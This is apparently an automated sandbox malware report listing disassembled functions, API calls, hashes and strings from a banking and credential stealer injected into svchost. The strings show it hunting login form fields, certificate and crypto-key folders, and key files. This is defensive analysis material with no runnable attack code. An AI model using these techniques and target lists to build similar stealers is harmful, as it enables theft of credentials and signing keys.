                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$HandleProcess$ErrorFileLastPathmemset$CloseCreateDirectoryFreeInformationSleepValidatelstrcpyn$AdminAttributesBackslashFolderMakeMutexSystemUser$CurrentDeleteReleaseUnmapView
                                                                                                                                                                                                                    • String ID: 7f1bfddb$Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}$P0#v$keys.zip$path.txt$pubkeys.key$secret.key
                                                                                                                                                                                                                    • API String ID: 3271848171-2785687885
                                                                                                                                                                                                                    • Opcode ID: 9e9a589f59627213d390dea9d56c8f8a65815f6c6738a9538559d0f58d6135f8
                                                                                                                                                                                                                    • Instruction ID: edd937d9dd211fdf14849e06959a517aaf84cf3747b41e19b0852adfee06e489
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e9a589f59627213d390dea9d56c8f8a65815f6c6738a9538559d0f58d6135f8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06C13771A44385AFE722AF74DC49BAB7BE8EF85708F448A5CF54987140DB70D608CBA1
                                                                                                                                                                                                                    Function 02C7F860 Relevance: 75.6, APIs: 40, Strings: 3, Instructions: 311memorynetworkCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?), ref: 02C7F8A1
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C7F8A4
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7F8BE
                                                                                                                                                                                                                    • InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 02C7F8DE
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 02C7F8FF
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C7F902
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7F917
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C7F92D
                                                                                                                                                                                                                    • InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 02C7F949
                                                                                                                                                                                                                    • InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 02C7F95C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000110), ref: 02C7F96C
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C7F96F
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7F98A
                                                                                                                                                                                                                    • InternetQueryOptionA.WININET(?,00000029,00000000,00000104), ref: 02C7F99D
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 02C7F9E9
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C7F9EC
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7FA00
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7FA10
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 02C7FA1E
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C7FA60
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C7FA8C
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7FA8F
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C7FA9C
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7FA9F
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FAAB
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7FAAE
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FABB
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7FABE
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FAD4
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7FAD7
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FAE4
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7FAE7
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?), ref: 02C7FB06
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7FB0F
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FB18
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7FB1B
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FB27
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7FB2A
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FB33
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7FB36
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$FreeValidatememset$AllocInternetOptionQuery$FileModuleName_snprintfmemcpy
                                                                                                                                                                                                                    • String ID: UserAgent$[[[URL: %s%sProcess: %sUser-agent: %s]]]{{{%s$}}}
                                                                                                                                                                                                                    • API String ID: 1808236364-2343086565
                                                                                                                                                                                                                    • Opcode ID: 5059307e4bb5ab225c1b9cbe16d8d201204079fcf2b91f4c19c6fad84db03181
                                                                                                                                                                                                                    • Instruction ID: 79b30ae1e4b622c55ed223cae5a6f65302ab7b872334e227b12909a26e2ec0b2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5059307e4bb5ab225c1b9cbe16d8d201204079fcf2b91f4c19c6fad84db03181
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9A1E471D40219ABDB11DFA89C89FEFBBB8EF84714F048549F904A7280DB709E05CBA1
                                                                                                                                                                                                                    Function 02C8C9E0 Relevance: 68.4, APIs: 25, Strings: 14, Instructions: 184threadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,self.cer,00000000,00000000,00000000,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CA1A
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\crypto\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CA28
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000001,02CB4230,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CA35
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\micros~\crypto\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAA7
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\maxthon3\public\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAB7
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\microsoft\crypto\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAC7
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\crypto pro\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAD7
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\progra~1\crypto~1\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAE7
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\temporary internet files\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAF7
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,:\users\public,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CB07
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,02CB81F4,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CB17
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,02CB4230,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CB23
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\cryptokit\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CB33
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,:\progra~1\common~1\crypto~1,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CB3F
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8B260,?,00000000,00000000), ref: 02C8CB62
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                                                    • String ID: :\progra~1\common~1\crypto~1$:\users\public$\crypto pro\$\crypto\$\cryptokit\$\maxthon3\public\$\microsoft\crypto\$\micros~\crypto\$\private\$\progra~1\crypto~1\$\public\$\temporary internet files\$crypto$self.cer
                                                                                                                                                                                                                    • API String ID: 2422867632-4225811205
                                                                                                                                                                                                                    • Opcode ID: d8506171dc54286aaa14f5635b2bd32ad6b004eb0e6c86e0684824d830d2683b
                                                                                                                                                                                                                    • Instruction ID: f957749078c1dfe3f2d110b89996cccc822d6fa633d1d0f0118c3aedab972dff
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8506171dc54286aaa14f5635b2bd32ad6b004eb0e6c86e0684824d830d2683b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB417271A8172675FA2AB6359C89FBB5E9C8ED09DCF108533FC06E2005EB74C70585B1
                                                                                                                                                                                                                    Function 02C87A80 Relevance: 66.7, APIs: 28, Strings: 10, Instructions: 244memorystringthreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000002,7622F570,?,?), ref: 02C87AA3
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C87AAA
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C87ABE
                                                                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,?), ref: 02C87ADB
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?), ref: 02C87AEC
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C87AFD
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C87B10
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFF41), ref: 02C87B3D
                                                                                                                                                                                                                    • PathAppendA.SHLWAPI(?,7F1BFF41), ref: 02C87B4B
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFF41), ref: 02C87B56
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C87BB8
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C87BCB
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BF8F3), ref: 02C87BFD
                                                                                                                                                                                                                    • PathAppendA.SHLWAPI(?,7F1BF8F3), ref: 02C87C0B
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BF8F3), ref: 02C87C16
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C90BE0,00000000,00000000,00000000), ref: 02C87C71
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C87C90
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C87CA3
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BF93B), ref: 02C87CCF
                                                                                                                                                                                                                    • PathAppendA.SHLWAPI(?,7F1BF93B), ref: 02C87CDD
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BF93B), ref: 02C87CE8
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C92320,00000000,00000000,00000000), ref: 02C87D43
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C87D5B
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C87D6C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C87D7B
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C87D7E
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C87D8B
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C87D8E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$BackslashHeapstrstr$AppendProcess$CreateHandleThread$AllocCloseFreeInformationReadValidatememcpymemset
                                                                                                                                                                                                                    • String ID: &ctl00%24MainMenu%24Login1%24Password=$&ctl00%24MainMenu%24Login1%24UserName=$7F1BF8F3$7F1BF93B$7F1BFF41$login=$name_$pass.log$pass_$password=
                                                                                                                                                                                                                    • API String ID: 3712039096-1140291071
                                                                                                                                                                                                                    • Opcode ID: 04d6f07cc634f9f4b2c971c0afa54e9ed0c96637571968c6b731d1860e327f11
                                                                                                                                                                                                                    • Instruction ID: 252726fe71358585feb8e42241803de4c5eb0124164b5c0843582dd19360e73c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 04d6f07cc634f9f4b2c971c0afa54e9ed0c96637571968c6b731d1860e327f11
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8818E31E4075467E7129B249C99FEB7BAC9F81745F24C0A5FD4997280EB70E948CBE0
                                                                                                                                                                                                                    Function 02C8E3D0 Relevance: 65.0, APIs: 31, Strings: 6, Instructions: 253memorysynchronizationsleepCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfde3), ref: 02C8E3F8
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(02CCB8D0,00000000), ref: 02C8E439
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8E43F
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8E447
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(02CCB8D0), ref: 02C8E456
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8E45D
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(02CCB8D0,00000000), ref: 02C8E499
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(02CCB8D0), ref: 02C8E4A4
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfde3,?,?), ref: 02C8E4E6
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(02CCB4B0,00000000), ref: 02C8E521
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8E527
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8E52F
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(02CCB4B0), ref: 02C8E53E
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8E545
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(02CCB4B0,00000000), ref: 02C8E573
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8E579
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8E581
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(02CCB4B0), ref: 02C8E590
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8E597
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 02C8E5A1
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8E5D7
                                                                                                                                                                                                                    • SHFileOperationA.SHELL32(?), ref: 02C8E651
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C8E662
                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 02C8E673
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C8E67A
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8E68C
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8E69C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C8E6AE
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C8E6B1
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C8E6BE
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C8E6C1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$Path$CreateFileHeap$AdminDirectoryFolderMakeSystemUser$AttributesBackslashHandleMutexProcess$CloseDeleteFreeInformationOperationReleaseSleepValidatememset
                                                                                                                                                                                                                    • String ID: 7f1bfde3$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$P0#v$\*.bk$keys\$path.txt
                                                                                                                                                                                                                    • API String ID: 959110331-2830706348
                                                                                                                                                                                                                    • Opcode ID: 9db40ca901118254195b30c4ea7cab12428f95a52a08c20201bb54579ef10ea2
                                                                                                                                                                                                                    • Instruction ID: 6466789fbf7a30f9a499f4654a09d8404d133709c81ab2713913d2c9a38732de
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9db40ca901118254195b30c4ea7cab12428f95a52a08c20201bb54579ef10ea2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A2911870E4468A9FE7129FB4982D7AB7BE8EF89309F148695F845D7301EB30CA05C790
                                                                                                                                                                                                                    Function 02C77110 Relevance: 63.2, APIs: 32, Strings: 4, Instructions: 182memorysleepsynchronizationCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C76CD0: IsUserAnAdmin.SHELL32 ref: 02C76CDA
                                                                                                                                                                                                                      • Part of subcall function 02C76CD0: memset.MSVCRT ref: 02C76D11
                                                                                                                                                                                                                      • Part of subcall function 02C76CD0: memset.MSVCRT ref: 02C76D29
                                                                                                                                                                                                                      • Part of subcall function 02C76CD0: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,?,?,7622F380), ref: 02C76D4B
                                                                                                                                                                                                                      • Part of subcall function 02C76CD0: RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,?,00000104,?,?,?,?,7622F380), ref: 02C76D71
                                                                                                                                                                                                                      • Part of subcall function 02C76CD0: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,7622F380), ref: 02C76DFD
                                                                                                                                                                                                                      • Part of subcall function 02C76CD0: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,7622F380), ref: 02C76E04
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02C77155
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C77162
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02C77174
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C7717D
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C77195
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C771A7
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,80F500FDa,80f5007ca), ref: 02C771B2
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C771B5
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C771C2
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C771C5
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,80F500FDa,80f5007ca), ref: 02C771D2
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C771D5
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C771E2
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C771E5
                                                                                                                                                                                                                    • SetCaretBlinkTime.USER32(000000FF), ref: 02C771F7
                                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 02C77225
                                                                                                                                                                                                                    • StrToIntA.SHLWAPI(00000000,80F500FDa,80f5007ca), ref: 02C77255
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,80F500FDa,80f5007ca), ref: 02C77265
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C77268
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C77275
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C77278
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,80F500FDa,80f5007ca), ref: 02C77285
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C77288
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C77295
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C77298
                                                                                                                                                                                                                    • Sleep.KERNEL32(00001388,80F500FDa,80f5007ca), ref: 02C772A3
                                                                                                                                                                                                                    • closesocket.WS2_32(?), ref: 02C772D5
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?), ref: 02C772F5
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C7730D
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C7731F
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C77342
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C7735C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$Free$HandleMutexValidate$OpenSleep$CloseInformationReleasememset$AdminAllocBlinkCaretQueryTimeUserValueclosesocket
                                                                                                                                                                                                                    • String ID: 80F500FDa$80f5007ca$Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}$P0#v
                                                                                                                                                                                                                    • API String ID: 2871222221-3176857679
                                                                                                                                                                                                                    • Opcode ID: 3548ed7930c8310a1a6d6fdce46fdacbe7c0baa39350409f53353e310799427f
                                                                                                                                                                                                                    • Instruction ID: 355d3170b7eb5f5d60cfc9c333afc7f07641622d6f6c910446bbb4ad717ae0df
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3548ed7930c8310a1a6d6fdce46fdacbe7c0baa39350409f53353e310799427f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC51E331E84798ABE722AB709C0CF2BBB6CAF84B55F044B54F919C7181DB74D9148BA1
                                                                                                                                                                                                                    Function 02C8B260 Relevance: 58.0, APIs: 25, Strings: 8, Instructions: 268fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8B27F
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC0D), ref: 02C8B2B7
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8B2F7
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8B301
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8B309
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8B31A
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8B321
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,crypto), ref: 02C8B333
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,self.cer), ref: 02C8B346
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,self.pub), ref: 02C8B357
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C8B3A2
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 02C8B3AF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorFileLastPath$AdminAttributesBackslashCreateDeleteDirectoryFolderMakeSystemUsermemset
                                                                                                                                                                                                                    • String ID: 7F1BFC0D$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}$P0#v$crypto$keys.zip$path.txt$self.cer$self.pub
                                                                                                                                                                                                                    • API String ID: 3980609930-47090278
                                                                                                                                                                                                                    • Opcode ID: b85e1bfe1a9c5eeb6e6165df905624b224069a2a6575898c6dfce15adcfa8f1d
                                                                                                                                                                                                                    • Instruction ID: 5ad5ee6bccef20e133d7fc16b21af62fb9397bf821c6795b30a19155e8360a8c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b85e1bfe1a9c5eeb6e6165df905624b224069a2a6575898c6dfce15adcfa8f1d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98912631D402999FDB16AB749C59BEA7BE8AFC570CF04C698E94AD7240DB70DE04CB90
                                                                                                                                                                                                                    Function 02C92AE0 Relevance: 56.2, APIs: 24, Strings: 8, Instructions: 193stringsynchronizationsleepCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C92B23
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C92B36
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C92B49
